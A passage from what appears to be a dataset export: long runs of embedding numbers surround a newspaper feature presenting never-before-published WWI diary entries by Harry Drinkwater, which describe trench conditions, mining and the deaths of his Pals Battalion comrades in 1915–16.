46678,-0.006562971975654364,-0.04625241458415985,0.00029353887657634914,-0.005633245687931776,-0.025926200672984123,-0.029335424304008484,0.02689424902200699,-0.05344461277127266,0.014023386873304844,0.08514131605625153,0.03752271085977554,0.036589208990335464,-0.029748285189270973,0.022820737212896347,0.028504569083452225,-0.07944321632385254,-0.0028581053484231234,-0.05178797245025635,0.0675855353474617,0.043908584862947464,0.020059220492839813,0.07200771570205688,0.007760973647236824,-0.12376442551612854,-0.002059187041595578,0.015241638757288456,-0.1301184445619583,0.03415187448263168,0.011208231560885906,-0.0025542424991726875,-0.03229188174009323,-0.004079627804458141,0.04684510454535484,-0.02722799964249134,0.10679773986339569,-0.028723113238811493,0.08802711218595505,-0.004590222146362066,-0.04934874549508095,0.017690973356366158,-0.09925804287195206,-0.07396357506513596,0.00465751625597477,0.0058590141125023365,-0.03795439004898071,0.0019783731549978256,-0.011901714839041233,0.12058097124099731,-0.02882305532693863,-0.04535140097141266,-2.6895266665775782e-33,-0.02240021526813507,0.043567903339862823,-0.031129073351621628,-0.03809602931141853,0.010069851763546467,0.03856338933110237,0.12289717048406601,0.02253391407430172,-0.07488203048706055,-0.07037639617919922,-0.0316038653254509,-0.01682194508612156,0.05796356499195099,0.04146634042263031,0.016520533710718155,-0.04106879606842995,-0.008271530270576477,0.04968048259615898,0.02392069436609745,-0.05308065563440323,0.11339306086301804,0.012380356900393963,0.06836577504873276,0.1274382770061493,-0.013532827608287334,0.010132914409041405,-0.07586327940225601,0.024248909205198288,0.025082537904381752,-0.006726368330419064,0.023407667875289917,0.04703575745224953,0.017473803833127022,0.06626053899526596,-0.05189596489071846,-0.009629338048398495,0.0030568966176360846,-0.05424325540661812,-0.02836206927895546,-0.007321898825466633,0.053040798753499985,-0.07595570385456085,-0.030383672565221786,-0.05653497949242592,-0.05946741998195648,0.003589709522202611,-0.00898701325058937,-0.06985791772603989,0.07273782789707184,-0.07423172891139984,0.030111948028206825,0.030326949432492256,-0.082835853099823,0.0006559781613759696,0.009043443016707897,-0.04490698128938675,0.04798392951488495,0.021694926545023918,-0.03944171220064163,-0.049217745661735535,-0.009499773383140564,-0.005421695299446583,0.024741871282458305,0.058098435401916504,-0.025937531143426895,0.0067656999453902245,0.09967730194330215,-0.0018041478469967842,0.04509229585528374,-0.03482680395245552,-0.07663402706384659,0.050572458654642105,-0.04657362028956413,0.010231146588921547,-0.05903162807226181,0.11796042323112488,0.01995263621211052,-0.02570849098265171,-0.009580699726939201,-0.025529684498906136,-0.0015506024938076735,0.06026702746748924,0.03129670396447182,-0.07371476292610168,0.03590312972664833,-0.09986381977796555,0.024750255048274994,-0.08324440568685532,0.01567324437201023,0.016318965703248978,-0.09669660031795502,-0.05956321209669113,-0.10323964059352875,0.039907436817884445,-0.008148899301886559,-5.065157537842424e-8,0.010796000249683857,0.022942638024687767,0.09754689782857895,-0.022646937519311905,-0.023996645584702492,-0.018544988706707954,-0.025379210710525513,0.019943006336688995,0.024051103740930557,-0.011011066846549511,0.06858237087726593,0.02163858152925968,0.05199015513062477,-0.03553864732384682,-0.02695528231561184,-0.0463239848613739,-0.02746415138244629,0.07396110892295837,0.04190004989504814,-0.0008038462838158011,0.05141338333487511,0.04041026532649994,-0.05651119351387024,-0.0006573755526915193,0.054242633283138275,0.034072812646627426,-0.07069277763366699,0.06107197701931,0.04365899786353111,0.014361592940986156,0.013868617825210094,-0.029720213264226913,0.012740684673190117,0.015079236589372158,-0.05013537406921387,-0.07527361810207367,-0.12058253586292267,-0.03793256729841232,-0.022989410907030106,0.01317146047949791,-0.00023338504252023995,0.0036130165681242943,0.03577122092247009,0.0048911720514297485,-0.05466337874531746,-0.05710839852690697,-0.03300688415765762,-0.02493775077164173,0.01890847273170948,0.033497780561447144,0.026225192472338676,0.00008059588435571641,0.02627933956682682,-0.0014567349571734667,0.03876039385795593,0.1252785325050354,-0.053862132132053375,-0.05487925559282303,-0.07104308903217316,-0.029309535399079323,-0.05863230675458908,-0.08699735254049301,-0.05816786363720894,0.07410461455583572],"string":"[\n 0.013282880187034607,\n 0.0353010930120945,\n 0.02255553938448429,\n 0.013468416407704353,\n 0.07223203033208847,\n -0.058683015406131744,\n -0.08272326737642288,\n 0.01854543201625347,\n -0.047682810574769974,\n -0.029436931014060974,\n -0.007258013356477022,\n -0.0147628765553236,\n -0.01466116402298212,\n -0.057560138404369354,\n 0.025263391435146332,\n 0.09703534096479416,\n -0.01958186738193035,\n -0.09541033953428268,\n -0.05561375990509987,\n -0.01963898167014122,\n 0.06366925686597824,\n 0.0018062497256323695,\n 0.029966074973344803,\n -0.09363426268100739,\n 0.07949350774288177,\n 0.007345120422542095,\n -0.07355065643787384,\n 0.00940885953605175,\n -0.010966552421450615,\n 0.06581655889749527,\n -0.03997395560145378,\n 0.07493093609809875,\n -0.03522830456495285,\n 0.029163731262087822,\n 0.06178560107946396,\n 0.07050839811563492,\n -0.024186167865991592,\n 0.04989216476678848,\n 0.004927071277052164,\n 0.036151811480522156,\n 0.011106283403933048,\n -0.01954757422208786,\n 0.08338326215744019,\n -0.04797200486063957,\n 0.00003771459523704834,\n 0.018495429307222366,\n 0.03371618688106537,\n -0.009999671950936317,\n -0.015371228568255901,\n -0.01401203591376543,\n 0.01885400153696537,\n -0.050029657781124115,\n -0.017166556790471077,\n -0.025743423029780388,\n -0.02269781567156315,\n -0.031299591064453125,\n 0.004170653410255909,\n 0.012046921998262405,\n -0.005278054159134626,\n 0.06942897289991379,\n 0.04203254356980324,\n -0.08789467811584473,\n -0.04714817926287651,\n -0.037358563393354416,\n 0.0411393828690052,\n 0.027727801352739334,\n 0.015962060540914536,\n 0.019901549443602562,\n -0.05693734809756279,\n -0.04398096352815628,\n 0.03645159304141998,\n -0.09691355377435684,\n -0.0066884891130030155,\n 0.03948159143328667,\n -0.07986830174922943,\n 0.006309400778263807,\n 0.10973535478115082,\n 0.010949209332466125,\n 0.10436739027500153,\n -0.05640088766813278,\n 0.042831458151340485,\n 0.019766444340348244,\n -0.015566335991024971,\n -0.09542308747768402,\n -0.010946383699774742,\n -0.014014636166393757,\n -0.026077812537550926,\n 0.04861387610435486,\n 0.020784547552466393,\n 0.048780180513858795,\n -0.042797960340976715,\n -0.040075767785310745,\n 0.02286459133028984,\n 0.052173834294080734,\n 0.04295273870229721,\n 0.1404026746749878,\n -0.04259485751390457,\n 0.017357584089040756,\n -0.06952790170907974,\n -0.034520070999860764,\n 0.06352149695158005,\n 0.11126499623060226,\n 0.078969307243824,\n -0.12208937853574753,\n -0.0614737868309021,\n 0.02769273705780506,\n -0.020793752744793892,\n 0.044303055852651596,\n 0.06300380080938339,\n -0.03700026497244835,\n -0.05333856865763664,\n 0.0760241374373436,\n -0.04493407905101776,\n -0.009622765704989433,\n 0.017050115391612053,\n -0.055967431515455246,\n 0.06785349547863007,\n -0.08519063889980316,\n -0.008769693784415722,\n 0.07640386372804642,\n 0.052778344601392746,\n -0.04978279769420624,\n -0.01072676945477724,\n -0.05617113411426544,\n 0.05571403354406357,\n 0.00029001376242376864,\n -0.05461272597312927,\n 1.0203187191026797e-33,\n -0.015376508235931396,\n 0.052736230194568634,\n 0.04388860985636711,\n -0.004440782591700554,\n -0.018093768507242203,\n 0.06762751191854477,\n 0.014097196981310844,\n -0.04588226601481438,\n -0.027243953198194504,\n 0.049037229269742966,\n -0.07245887070894241,\n 0.0422484427690506,\n -0.03266521170735359,\n 0.062931127846241,\n 0.048675935715436935,\n -0.1511206030845642,\n 0.056771181523799896,\n -0.09913374483585358,\n 0.009216118603944778,\n 0.03852466493844986,\n 0.038684744387865067,\n -0.030476750805974007,\n -0.01589411497116089,\n 0.003360527800396085,\n 0.034455556422472,\n -0.08973608911037445,\n 0.10990527272224426,\n -0.06060661002993584,\n 0.02919420227408409,\n 0.05457653850317001,\n -0.006740021985024214,\n -0.018561994656920433,\n -0.022939620539546013,\n -0.06228796765208244,\n -0.05849974602460861,\n -0.02595117688179016,\n -0.020826978608965874,\n -0.011405226774513721,\n -0.016726624220609665,\n 0.029919292777776718,\n -0.01588403806090355,\n 0.04843609035015106,\n -0.10777856409549713,\n 0.06020159646868706,\n -0.017514115199446678,\n -0.006562971975654364,\n -0.04625241458415985,\n 0.00029353887657634914,\n -0.005633245687931776,\n -0.025926200672984123,\n -0.029335424304008484,\n 0.02689424902200699,\n -0.05344461277127266,\n 0.014023386873304844,\n 0.08514131605625153,\n 0.03752271085977554,\n 0.036589208990335464,\n -0.029748285189270973,\n 0.022820737212896347,\n 0.028504569083452225,\n -0.07944321632385254,\n -0.0028581053484231234,\n -0.05178797245025635,\n 0.0675855353474617,\n 0.043908584862947464,\n 0.020059220492839813,\n 0.07200771570205688,\n 0.007760973647236824,\n -0.12376442551612854,\n -0.002059187041595578,\n 0.015241638757288456,\n -0.1301184445619583,\n 0.03415187448263168,\n 0.011208231560885906,\n -0.0025542424991726875,\n -0.03229188174009323,\n -0.004079627804458141,\n 0.04684510454535484,\n -0.02722799964249134,\n 0.10679773986339569,\n -0.028723113238811493,\n 0.08802711218595505,\n -0.004590222146362066,\n -0.04934874549508095,\n 0.017690973356366158,\n -0.09925804287195206,\n -0.07396357506513596,\n 0.00465751625597477,\n 0.0058590141125023365,\n -0.03795439004898071,\n 0.0019783731549978256,\n -0.011901714839041233,\n 0.12058097124099731,\n -0.02882305532693863,\n -0.04535140097141266,\n -2.6895266665775782e-33,\n -0.02240021526813507,\n 0.043567903339862823,\n -0.031129073351621628,\n -0.03809602931141853,\n 0.010069851763546467,\n 0.03856338933110237,\n 0.12289717048406601,\n 0.02253391407430172,\n -0.07488203048706055,\n -0.07037639617919922,\n -0.0316038653254509,\n -0.01682194508612156,\n 0.05796356499195099,\n 0.04146634042263031,\n 0.016520533710718155,\n -0.04106879606842995,\n -0.008271530270576477,\n 0.04968048259615898,\n 0.02392069436609745,\n -0.05308065563440323,\n 0.11339306086301804,\n 0.012380356900393963,\n 0.06836577504873276,\n 0.1274382770061493,\n -0.013532827608287334,\n 0.010132914409041405,\n -0.07586327940225601,\n 0.024248909205198288,\n 0.025082537904381752,\n -0.006726368330419064,\n 0.023407667875289917,\n 0.04703575745224953,\n 0.017473803833127022,\n 0.06626053899526596,\n -0.05189596489071846,\n -0.009629338048398495,\n 0.0030568966176360846,\n -0.05424325540661812,\n -0.02836206927895546,\n -0.007321898825466633,\n 0.053040798753499985,\n -0.07595570385456085,\n -0.030383672565221786,\n -0.05653497949242592,\n -0.05946741998195648,\n 0.003589709522202611,\n -0.00898701325058937,\n -0.06985791772603989,\n 0.07273782789707184,\n -0.07423172891139984,\n 0.030111948028206825,\n 0.030326949432492256,\n -0.082835853099823,\n 0.0006559781613759696,\n 0.009043443016707897,\n -0.04490698128938675,\n 0.04798392951488495,\n 0.021694926545023918,\n -0.03944171220064163,\n -0.049217745661735535,\n -0.009499773383140564,\n -0.005421695299446583,\n 0.024741871282458305,\n 0.058098435401916504,\n -0.025937531143426895,\n 0.0067656999453902245,\n 0.09967730194330215,\n -0.0018041478469967842,\n 0.04509229585528374,\n -0.03482680395245552,\n -0.07663402706384659,\n 0.050572458654642105,\n -0.04657362028956413,\n 0.010231146588921547,\n -0.05903162807226181,\n 0.11796042323112488,\n 0.01995263621211052,\n -0.02570849098265171,\n -0.009580699726939201,\n -0.025529684498906136,\n -0.0015506024938076735,\n 0.06026702746748924,\n 0.03129670396447182,\n -0.07371476292610168,\n 0.03590312972664833,\n -0.09986381977796555,\n 0.024750255048274994,\n -0.08324440568685532,\n 0.01567324437201023,\n 0.016318965703248978,\n -0.09669660031795502,\n -0.05956321209669113,\n -0.10323964059352875,\n 0.039907436817884445,\n -0.008148899301886559,\n -5.065157537842424e-8,\n 0.010796000249683857,\n 0.022942638024687767,\n 0.09754689782857895,\n -0.022646937519311905,\n -0.023996645584702492,\n -0.018544988706707954,\n -0.025379210710525513,\n 0.019943006336688995,\n 0.024051103740930557,\n -0.011011066846549511,\n 0.06858237087726593,\n 0.02163858152925968,\n 0.05199015513062477,\n -0.03553864732384682,\n -0.02695528231561184,\n -0.0463239848613739,\n -0.02746415138244629,\n 0.07396110892295837,\n 0.04190004989504814,\n -0.0008038462838158011,\n 0.05141338333487511,\n 0.04041026532649994,\n -0.05651119351387024,\n -0.0006573755526915193,\n 0.054242633283138275,\n 0.034072812646627426,\n -0.07069277763366699,\n 0.06107197701931,\n 0.04365899786353111,\n 0.014361592940986156,\n 0.013868617825210094,\n -0.029720213264226913,\n 0.012740684673190117,\n 0.015079236589372158,\n -0.05013537406921387,\n -0.07527361810207367,\n -0.12058253586292267,\n -0.03793256729841232,\n -0.022989410907030106,\n 0.01317146047949791,\n -0.00023338504252023995,\n 0.0036130165681242943,\n 0.03577122092247009,\n 0.0048911720514297485,\n -0.05466337874531746,\n -0.05710839852690697,\n -0.03300688415765762,\n -0.02493775077164173,\n 0.01890847273170948,\n 0.033497780561447144,\n 0.026225192472338676,\n 0.00008059588435571641,\n 0.02627933956682682,\n -0.0014567349571734667,\n 0.03876039385795593,\n 0.1252785325050354,\n -0.053862132132053375,\n -0.05487925559282303,\n -0.07104308903217316,\n -0.029309535399079323,\n -0.05863230675458908,\n -0.08699735254049301,\n -0.05816786363720894,\n 0.07410461455583572\n]"}}},{"rowIdx":1283,"cells":{"text":{"kind":"string","value":"Diary of the damned: Never seen before, a lost diary of the Great War so brutally vivid you'll feel YOU are there in the trenches\n\nHarry Drinkwater joined a 'Pals Battalion' when the war began in 1914\n\nHe was sent to the front lines and suffered the grueling realities of war\n\nHis diary entries, never before published, tell of his hellish existence caked in mud, deprived of sleep and endlessly confronted by the deaths of his friends\n\nVolunteer: Harry Drinkwater, pictured, recorded the horrors of the First World War in vivid diary entries\n\nAfter volunteering as an Army private following the outbreak of World War I in 1914, former grammar-school boy Harry Drinkwater, 25, joined a ‘Pals battalion’ — so-called because the men were encouraged to join up with local friends and work colleagues.\n\nA few months later, his conversion from Stratford-upon-Avon shop assistant to soldier was complete.\n\nIn this extract from his remarkable diary - which it was strictly against the rules to keep and which has been published for the first time - Harry writes about his brutal introduction to the trenches at the Somme in Picardie, Northern France...\n\nThursday, December 16, 1915\n\nArrived in [the hamlet of] Suzanne today, after a very hard march. We’re billeted in tents, 12 men in each, encamped between the enemy and our own heavy guns.\n\nAt night-time, one sees little slits of light shining from the tents on the puddles of water outside, which give the impression of a fairy land.\n\nRolling into our blankets, we occasionally hear the ‘splash, splash’ as some fellow moves from one tent to another, or the plod of the sentry. Plus the continual shriek of shells.\n\nTomorrow we go into the trenches. I wonder what sort of a show we will make.\n\nSunday, December 19\n\nNo words can adequately describe the conditions. It’s not the Germans we’re fighting, but the weather. Within an hour of moving off, we were up to our knees in mud and water.\n\nThe mud gradually got deeper as we advanced along the trench.\n\nWe hadn’t gone far before we had to duck; the enemy were sending over their evening salute of shells.\n\nPals battalion: Harry (centre left, marked in blue ink) joined the Second Birmingham Battalion alongside friends from home. Most of them died by the end of the war\n\nTo move forward, I had to use both elbows for leverage, one each side of the trench. After about one and a half hours of this, we reached the firing line. Later, I groped my way to our dugout. What a sight.\n\nImagine a room underneath the ground, whose walls are slimy with moisture. The floor is a foot or more deep in rancid-smelling mud.\n\nMonday, December 20\n\nThe trenches are in a terrible condition — anything up to 4ft deep in mud and water. We’re plastered in mud up to our faces.\n\nOur food - cold bacon, bread and jam - is slung together in a sack that hangs from the dripping dugout roof. Consequently, we eat and drink mud.\n\nTuesday, December 21\n\nHeavy bombardment at about 11am. Heard a fearful crash. The next dugout to ours blown to blazes, and our physical drill instructor Sergeant Horton with it.\n\nI helped dig him out. But before we could get him anywhere, he’d departed this life - our first experience of death. I’m tired out, sick of everything.\n\nSaturday, December 25\n\nAfter five days in the trenches, we’re thankful we can still walk. I’ve had approximately an hour’s sleep a day - always standing up.\n\nOften, when from sheer exhaustion I doze off, I’m awakened by a fat squeaking rat on my shoulder or feel it running over my head.\n\nMost of the rations fail to arrive - because the communication trenches are water-logged and being continually shelled. We eat with hands caked in mud, which has caused many cases of acute dysentery.\n\nDeluged: Three members of Harry's company can be seen here posing in a trench flooded with mud almost to waist height\n\nIn common with others, I’ve done regular turns at the firing line. It’s a very creepy business looking over the top, imagining every noise is a German. A rat skirmishing among empty tins in no-man’s land is sufficient to attract all our attention.\n\nEach morning, one hour before daybreak, every man stands in the trench until daylight. This is in case the Germans follow the old custom of attacking just before dawn. The same happens an hour before sunset.\n\nLast night, I had a narrow squeak. I was wedged in the mud when I heard a shell coming. Unable to move quickly, I crouched when it burst on the parapet and got covered in dirt.\n\nLater, we marched to our billets [for rest days]. This morning, Christmas Day, I took my shirt off - thick with dried mud - and had a wash. We had one tub and no soap between about 50 fellows.\n\nFriday, December 31\n\nBack on the firing line, and nearly up to our waists in mud. We’ve found a new diversion — at dusk, we put a small piece of cheese on the end of a bayonet, wait for a rat to have a nibble, and then pull the trigger.\n\nSaturday, January 8, 1916\n\nRaffle prize: Harry won this German scabbard in a raffle and sent it home\n\nAt about 3.30am, I heard noises that sounded like wires scraping together. Half an hour later, a sentry spotted two men rising from the ground about 30 yards in front of our trench. We all opened rapid fire.\n\nAt daybreak, we saw the result: a dead German lay about 20 yards in front. Scattered around were about a dozen hand-grenades. Given another five minutes, our trench would have been blown to bits.\n\nThe victim had got partly through our barbed wire — which is probably what I heard. Later, we raffled his bayonet scabbard. I was the winner and sent it home as a souvenir.\n\nHarry’s next posting was to the front line near Arras in the region of Artois.\n\nSaturday, March 4\n\nNothing here but trench after trench and, in places, the ground blown into heaps of dirt. The trees have been hacked to pieces — only black stumps remain. Nothing grows. Utter desolation.\n\nTuesday, March 7\n\nWorked at a feverish pace, digging and strengthening trenches all through last night. Then through the day, I have to do an hour’s sentry duty every third hour.\n\nThis is followed by an hour as the relief man, when I’m able to sit down. For the third hour, I can sleep. I’m feeling like most of the other fellows - half dead.\n\nWednesday, March 8\n\nSnowed all night. Had a hard job to keep awake. One or two fellows - of whom I was one - were found to be fast asleep at the end of their sentry. We’d gone to sleep standing up - and the relief man was also asleep.\n\nUnder military law, this is a crime of the first water [punishable by execution]. So, as a preventative, we’ve arranged between ourselves that each sentry along the trench will fire his rifle at intervals.\n\nAt dusk, I put my head over the top to have a look around and stopped a bullet on the side of my steel hat. The vibration made my head ache.\n\nThursday, March 9\n\nOwing to food transports going astray, we have one loaf between five of us, a few biscuits and half a tin of marmalade each per day. Have just heard we have a ten-mile march before we can be billeted [for rest]. Jolly hard lines.\n\nRest: This annotated photograph shows the 'billets' where Harry and his comrades were taken for rest\n\nFriday, March 10\n\nIt was snowing as we set out at 11.15 last night. I saw two fellows - fast asleep as they walked along - walk out of the ranks and fall into the ditch at the side of the road.\n\nWe halted for ten minutes’ rest and I dropped down into a puddle and went to sleep. Was unable to get up without help, and ended up hanging on to Lieutenant Davis on one side and a stretcher-bearer the other.\n\nTried to pull myself together and went headlong on the road. They got me to my feet again but I was helpless. Have a vague idea that I was laid on some straw. Then oblivion.\n\nCasualty: Harry's diary described bringing wounded men back from the frontlines. The men pictured were fighting in the Battle of the Somme, where Harry also fought\n\nSunday, April 23\n\nEaster Sunday. A beautifully sunny [rest] day. I’m writing in a field beside a brook — I can easily imagine myself back in England.\n\nWe’re all struck with the strangeness of things; one week in Hell and the next in comparative bliss.\n\nHarry was also helping to dig deep shafts that branched out towards the enemy lines. The idea was to lay explosive charges beneath German trenches - but as the Germans were doing likewise, the mining teams often tried to blow each other up halfway across.\n\nSunday, May 7\n\nWorking in the mines - an awful strain mentally. We’re some three-parts of a mile under the ground. Air is got down by means of a large pair of blacksmith’s bellows, connected to a long pipe. But it’s very stuffy, and we work with backs bent for eight hours.\n\nMonday, May 8\n\nMines again. Feeling very fed up. No one jokes: we all have it in the back of our minds that the Germans’ mines will go up while we’re down one of ours - and it’s not a pleasant reflection.\n\nFriday, May 19\n\nThe Germans forestalled us this morning by about three hours. After three months of hard work, our K14 mine, timed to go up at 8am, was blown in by the Germans at 4.30am.\n\nThere was a terrific explosion. The ground for yards around was lifted skywards, leaving a huge crater in the ground.\n\nHellish fields: An aerial photograph of the trenches where Harry served\n\nCaptain Edwards, our company captain, crept out over my parapet to investigate the damage and was met by a fusillade of bullets. He stopped one through the shoulder and one in the head.\n\nThe moment after he was hit, an engineer sprang on to the parapet and, crawling on his stomach, dragged him back.\n\nIt’s worth noting that the German sentry who shot Edwards could also have shot his rescuer. If he refrained from humane motives, he was a sportsman.\n\nSaturday, May 20\n\nOne of our fellows put his head and shoulders over the top and was immediately sniped through the head.\n\nSunday, May 21\n\nAfter sentry duty, we passed Major Jones, second-in-command of the battalion, as we crept back to the dugout. Ten minutes later, he was being dug out of about 3ft of earth.\n\nHe’d gone out to the mine crater after passing us. Death was instant.\n\nWe’d barely arrived at our dugout when a runner came along and gave the gas alarm. At the same time, shells were raining down.\n\nBrothers: William Hundy (far left) was killed by German fire, and was so badly disfigured that his own brother, Herbert Hundy (second left, standing with a pipe), did not realise who he was. Harry is second from the right in this photograph\n\nI helped to carry an NCO to the dressing station. His features were blown away but I recognised him by his identity disk as one of my pals.\n\nHe was one of two brothers. The other, a stretcher-bearer unconscious of his identity, was the one who dug him out. Arrived back at the dugout feeling very sick.\n\nMonday May 22\n\nAt 11pm, our fellows, not sure of their ground in the dark, started slinging bombs in among themselves. Quite a usual occurrence.\n\nWednesday, May 24\n\nToday, D Company, on our left, went over the top. They’d got about 100 yards when they were met by a cross-fire of machine guns and rifle fire.\n\nBut they still advanced. Some got to the German lines and were killed on the parapet; some got entangled in the barbed wire and riddled with bullets. Casualties: 33.\n\nOrders were now given to erect barbed wire defences in the crater left by the exploded mine.\n\nTuesday, May 30\n\nAt 3am, we crawled into the crater and carried on wiring - just 15 yards from the German listening post. This crater alone has cost us 20 casualties so far.\n\nWednesday, May 31\n\nSix of us relieved the sentries in the crater. It was an uncanny night: raw, cold and a thick mist. We lay on the inside lip and hardly moved.\n\nAt the first twinge of dawn, one of the fellows peeped over the top and saw four Germans digging like blazes within 12 yards of where we were lying.\n\nDiaries: Harry's remarkable diary is being published for the first time, 35 years after he died\n\nFor some reason, we’d been told that under no circumstances were we to fire; so we withdrew. It’s never been very clear to me why we should risk so much life just to put barbed wire entanglements in the bottom of a crater.\n\nToday, it’s been strafed all day long. The Germans are very restless over this crater. They can’t quite make out what we’re doing with it and what we want it for.\n\nThursday, June 1\n\nThe crater has been completely transformed. We’ve now built a little shack on the near side, protected by sandbags.\n\nTuesday, June 6\n\nAt 4pm on Sunday, a shell landed in front of me and another behind, blowing in the rear of the trench and smothering me with dirt. Casualties were occurring rapidly.\n\nI’d barely bandaged Jones, who was badly hit, when Eastwood came rushing in to say the shelter in the crater had been blown in and the sentry group buried. A day sooner, and I’d have been one of them.\n\nJinks and I gathered picks and shovels and made for the crater. We’d crawled about 15 yards when a shell landed immediately on top of the trench, partly burying us with earth.\n\nI felt the force of the explosion force my head into my body and it was some seconds before I was able to see. By this time, it was impossible to go on. The ground vibrated with explosions and the air was thick with sulphurous fumes.\n\nBuried alive: Sergeant Ashby (pictured far left before leaving to fight) was buried in the mine crater mentioned in Harry's 6 June entry\n\nI didn’t for a moment think we’d get out of this alive. But, after three hours, everything ceased as suddenly as it started.\n\nLater, I found an unexploded shell within a couple of feet of where Jinks and I had been lying. The gods had been good.\n\nWe made our way back to the front line, dazed. It was unrecognisable: a series of holes, no real trench remaining.\n\nSome fellows were lying about dead, some wounded and some alive - one of whom inquired about the fellows in the crater. Then I remembered why I’d left the line.\n\nGathering up what picks we could find, a sergeant and I crawled back over the top and into the crater. A wretched sight.\n\nYoung Cooper was wedged in the doorway dead, the remainder buried under the shack. We dug like fury for two hours, impelled by the fact that we could hear someone faintly groaning - and that at any moment, the Germans would be coming over.\n\nOnly Sergeant Ashby had some signs of life. Leaving those we couldn’t help, we carried him down to what remained of the front line.\n\nAt 9.30pm, Raper and Middleton - close friends - went down, killed by a rifle grenade. Then Jinks was hit by another as we lay next to each other. His legs had been blown off and he was going fast.\n\nI could do little else than kneel by his side. He asked me not to leave him and recognised me almost to the last moment. I saw him go West. It was quickly over.\n\nHarry Drinkwater, 25, joined a ‘Pals battalion’ — so-called because the men were encouraged to join up with local friends and work colleagues\n\nMeanwhile, the Germans were coming in. Only a few got out of our trench again; the rest of the Germans were either bayoneted or bombed, and we buried them later.\n\nWednesday, June 7\n\nTotal battalion casualties for Sunday: 120. The roll-call this morning was somewhat pathetic. Each time a name was called out and no one answered, we had to say if we’d seen the fellow killed or knew if he was wounded.\n\nThere are now very few of the original men I joined with. The idea under which the battalion was formed, that of friends serving together, has long since passed.\n\nThursday, June 15\n\nThis afternoon we lost four more. But we’re quite resigned nowadays to losing old originals. It seems as if the fates have decreed that they’ve had a good run and it’s time they went.\n\nKilby asks: ‘Whose turn next?’ We all wonder...\n\nKilby is last mentioned in a diary entry dated January 23, 1917. He and Harry are at a rest camp in Boulogne and Harry is leaving for Blighty. By the end of the war, Harry had served on the Somme, at Ypres and in Italy and had received the Military Cross for bravery. After being demobbed, he worked as a civil servant. He never married and died in 1978."},"embedding":{"kind":"list like","value":[-0.03672265633940697,-0.0004835495783481747,0.0013871716801077127,0.00537482276558876,0.03551249951124191,0.030717935413122177,0.028023457154631615,-0.06856250762939453,-0.04367855191230774,-0.06534157693386078,-0.018413186073303223,0.03516208752989769,-0.005688359495252371,0.09264229238033295,-0.025375740602612495,0.011758442036807537,-0.060592640191316605,-0.04297846183180809,-0.03121691383421421,-0.001402229187078774,-0.034134913235902786,-0.003037465736269951,0.1282140165567398,-0.0502777136862278,0.04339543730020523,0.03341258689761162,0.0002878537925425917,0.011992225423455238,-0.06347844749689102,0.03976566344499588,-0.05182843282818794,0.016788220033049583,-0.04409365728497505,-0.0993313416838646,0.07308197021484375,0.030740348622202873,0.1508769541978836,0.05415496975183487,0.07092143595218658,-0.0823480561375618,-0.06630314141511917,-0.047131020575761795,0.04469230771064758,0.05230579525232315,-0.04990192502737045,0.03691048175096512,-0.004676224198192358,-0.0028381701558828354,-0.04411432892084122,0.04238284006714821,0.005378847476094961,0.013819679617881775,0.06902371346950531,-0.03719869628548622,0.024985847994685173,-0.016952261328697205,0.0037901338655501604,0.08103320002555847,-0.041681233793497086,-0.016626203432679176,-0.10167163610458374,-0.02213151752948761,-0.029340842738747597,0.025005102157592773,-0.03892597183585167,-0.01863526739180088,-0.016124729067087173,0.0848924070596695,0.02895863726735115,0.02885235659778118,-0.050711024552583694,0.061818383634090424,0.04066899046301842,-0.07472562044858932,-0.06381764262914658,0.009139865636825562,0.023012923076748848,0.05068567395210266,0.03581325709819794,-0.0017147863982245326,0.0349218025803566,0.10531260818243027,0.1512337177991867,0.0385797880589962,-0.033172935247421265,-0.06546144187450409,0.02169593796133995,-0.07824314385652542,-0.0007450432749465108,0.039312683045864105,-0.030373547226190567,-0.06202295422554016,0.01927361451089382,0.048723254352808,0.060257766395807266,-0.01375963818281889,0.03874564543366432,0.11564289778470993,-0.03694932535290718,0.03749311342835426,0.03321058675646782,0.03748644143342972,0.00258794822730124,0.02905462123453617,0.06804266571998596,-0.03303397074341774,-0.03096841461956501,0.003962759859859943,0.0299169160425663,-0.013187291100621223,-0.024849260225892067,0.07863130420446396,-0.034200556576251984,-0.055468861013650894,0.016343239694833755,-0.010837430134415627,0.0027220819611102343,-0.041727542877197266,-0.03878206014633179,0.1395915448665619,-0.015471461229026318,0.06010664254426956,-0.00339123560115695,0.11361504346132278,-0.06401346623897552,0.08769133687019348,0.09175443649291992,1.0695467694761863e-33,0.0920182392001152,-0.05822966620326042,-0.07838783413171768,0.06952814757823944,0.07431711256504059,0.009406576864421368,-0.036698117852211,0.043028008192777634,0.013016750104725361,-0.06620107591152191,-0.031465571373701096,-0.020779365673661232,0.000840845750644803,-0.011975361034274101,-0.07961413264274597,-0.03810644894838333,-0.028049491345882416,0.02426891401410103,0.01882283203303814,-0.07053027302026749,0.004220183007419109,-0.038174185901880264,0.022099465131759644,-0.01386320497840643,-0.03358801454305649,0.04293563961982727,-0.003900940530002117,0.06155795976519585,0.0031177711207419634,0.034695159643888474,-0.018593624234199524,-0.0118324039503932,-0.001621066709049046,-0.05425218120217323,-0.059160903096199036,-0.0044722300954163074,0.06281454116106033,-0.07544125616550446,0.02488906867802143,-0.10812543332576752,0.012957720085978508,0.032416652888059616,-0.010779423639178276,-0.08244966715574265,-0.005843698512762785,0.00005479173705680296,-0.06374374777078629,0.011949700303375721,-0.029965389519929886,-0.0013245389563962817,-0.03648873046040535,0.015188251622021198,-0.08640971034765244,0.031148500740528107,-0.08999254554510117,-0.011234648525714874,0.0448320247232914,-0.019121414050459862,0.0005358451162464917,-0.04681393504142761,0.045909471809864044,0.05223887413740158,0.020088158547878265,0.03609664738178253,-0.08274274319410324,-0.03143779933452606,-0.05849737301468849,-0.02682132087647915,0.013345749117434025,-0.10716445744037628,-0.08499789983034134,0.008726485073566437,-0.03679567575454712,-0.11181578040122986,0.010157205164432526,0.026971202343702316,0.09326989203691483,0.0271509550511837,-0.04709508642554283,0.0024946886114776134,0.03505057096481323,0.052817635238170624,-0.08144351094961166,-0.005428739357739687,-0.04969509690999985,-0.07422787696123123,0.012549360282719135,-0.10257325321435928,-0.04478643462061882,0.031674329191446304,-0.049296487122774124,0.021945614367723465,0.002951538423076272,-0.0793202817440033,-0.011586264707148075,-5.0886731677234346e-33,0.06760691851377487,0.01047605462372303,0.029737701639533043,-0.09902481734752655,-0.02862389199435711,-0.03775063157081604,-0.000017493270206614397,0.04344954341650009,0.07465511560440063,0.03337465599179268,-0.043872833251953125,0.0021711017470806837,0.0023085838183760643,0.031452108174562454,-0.05574151873588562,0.017244260758161545,-0.038005582988262177,-0.008407899178564548,0.03489784523844719,0.04039293900132179,0.07025018334388733,0.0305072870105505,-0.03340744599699974,